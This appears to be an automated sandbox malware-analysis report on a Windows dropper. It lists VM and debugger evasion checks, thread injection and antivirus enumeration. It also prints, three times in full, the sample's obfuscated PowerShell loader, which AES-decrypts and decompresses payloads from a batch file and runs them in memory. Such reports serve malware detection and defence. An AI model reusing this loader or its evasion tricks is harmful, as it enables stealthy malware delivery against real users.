Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
.NET source code contains a sample name check
Source: 7.2.powershell.exe.1c691b00b88.3.raw.unpack, ---.cs .Net Code: _F6A9_24CA_2622_EF60_FFFD contains sample name check
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3208 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6690 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3984 Thread sleep count: 3208 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3984 Thread sleep count: 6690 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3240 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D12034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00007FF776D12034
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D16710 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA, 0_2_00007FF776D16710
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: Amcache.hve.10.dr Binary or memory string: VMware
Source: Amcache.hve.10.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.10.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.10.dr Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.10.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.10.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.10.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.10.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.10.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.10.dr Binary or memory string: vmci.sys
Source: Amcache.hve.10.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.10.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.10.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.10.dr Binary or memory string: VMware20,1
Source: Amcache.hve.10.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.10.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.10.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.10.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.10.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugFlags Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugObjectHandle Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D11D10 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree, 0_2_00007FF776D11D10
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D18A1E SetUnhandledExceptionFilter, 0_2_00007FF776D18A1E
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D18714 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF776D18714

HIPS / PFW / Operating System Protection Evasion
barindex
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 5840 Jump to behavior
Sets debug register (to hijack the execution of another thread)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: 5840 1 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function fpxon($kxght){ $mjrur=[system.security.cryptography.aes]::create(); $mjrur.mode=[system.security.cryptography.ciphermode]::cbc; $mjrur.padding=[system.security.cryptography.paddingmode]::pkcs7; $mjrur.key=[system.convert]::frombase64string('j3+l8mvxgsnkbbofftdiy9ifllqehu8shlqb9w611ku='); $mjrur.iv=[system.convert]::frombase64string('c7dlt1nshfaiyjxep0ixiq=='); $wvvmf=$mjrur.createdecryptor(); $cvtyc=$wvvmf.transformfinalblock($kxght, 0, $kxght.length); $wvvmf.dispose(); $mjrur.dispose(); $cvtyc;}function ogptr($kxght){ invoke-expression '$bjdne=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$kxght);'.replace('blck', ''); invoke-expression '$ettpq=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$gttnv=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($bjdne, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $gttnv.copyto($ettpq); $gttnv.dispose(); $bjdne.dispose(); $ettpq.dispose(); $ettpq.toarray();}function vcyyt($kxght,$goojw){ invoke-expression '$chmli=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$kxght);'.replace('blck', ''); invoke-expression '$wmcot=$chmli.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$wmcot.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $goojw)blck;'.replace('blck', '');}$yeswh = 'c:\users\user\appdata\local\temp\ixp000.tmp\vclib.bat';$host.ui.rawui.windowtitle = $yeswh;$lzgcg=[system.io.file]::readalltext($yeswh).split([environment]::newline);foreach ($zwdbb in $lzgcg) { if ($zwdbb.startswith(':: ')) { $ggizq=$zwdbb.substring(3); break; }}$ncixk=[string[]]$ggizq.split('\');invoke-expression '$mmtjj=ogptr (fpxon (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ncixk[0])));'.replace('blck', '');invoke-expression '$gdpgz=ogptr (fpxon (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ncixk[1])));'.replace('blck', '');vcyyt $mmtjj (,[string[]] (''));vcyyt $gdpgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function fpxon($kxght){ $mjrur=[system.security.cryptography.aes]::create(); $mjrur.mode=[system.security.cryptography.ciphermode]::cbc; $mjrur.padding=[system.security.cryptography.paddingmode]::pkcs7; $mjrur.key=[system.convert]::frombase64string('j3+l8mvxgsnkbbofftdiy9ifllqehu8shlqb9w611ku='); $mjrur.iv=[system.convert]::frombase64string('c7dlt1nshfaiyjxep0ixiq=='); $wvvmf=$mjrur.createdecryptor(); $cvtyc=$wvvmf.transformfinalblock($kxght, 0, $kxght.length); $wvvmf.dispose(); $mjrur.dispose(); $cvtyc;}function ogptr($kxght){ invoke-expression '$bjdne=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$kxght);'.replace('blck', ''); invoke-expression '$ettpq=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$gttnv=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($bjdne, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $gttnv.copyto($ettpq); $gttnv.dispose(); $bjdne.dispose(); $ettpq.dispose(); $ettpq.toarray();}function vcyyt($kxght,$goojw){ invoke-expression '$chmli=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$kxght);'.replace('blck', ''); invoke-expression '$wmcot=$chmli.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$wmcot.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $goojw)blck;'.replace('blck', '');}$yeswh = 'c:\users\user\appdata\local\temp\ixp000.tmp\vclib.bat';$host.ui.rawui.windowtitle = $yeswh;$lzgcg=[system.io.file]::readalltext($yeswh).split([environment]::newline);foreach ($zwdbb in $lzgcg) { if ($zwdbb.startswith(':: ')) { $ggizq=$zwdbb.substring(3); break; }}$ncixk=[string[]]$ggizq.split('\');invoke-expression '$mmtjj=ogptr (fpxon (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ncixk[0])));'.replace('blck', '');invoke-expression '$gdpgz=ogptr (fpxon (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ncixk[1])));'.replace('blck', '');vcyyt $mmtjj (,[string[]] (''));vcyyt $gdpgz (,[string[]] ('')); Jump to behavior
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D11258 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle, 0_2_00007FF776D11258
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D18BF4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter, 0_2_00007FF776D18BF4
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D13D34 GetVersionExA,MessageBeep,MessageBoxA, 0_2_00007FF776D13D34
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.10.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.10.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.10.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.10.dr Binary or memory string: MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
windows-stand
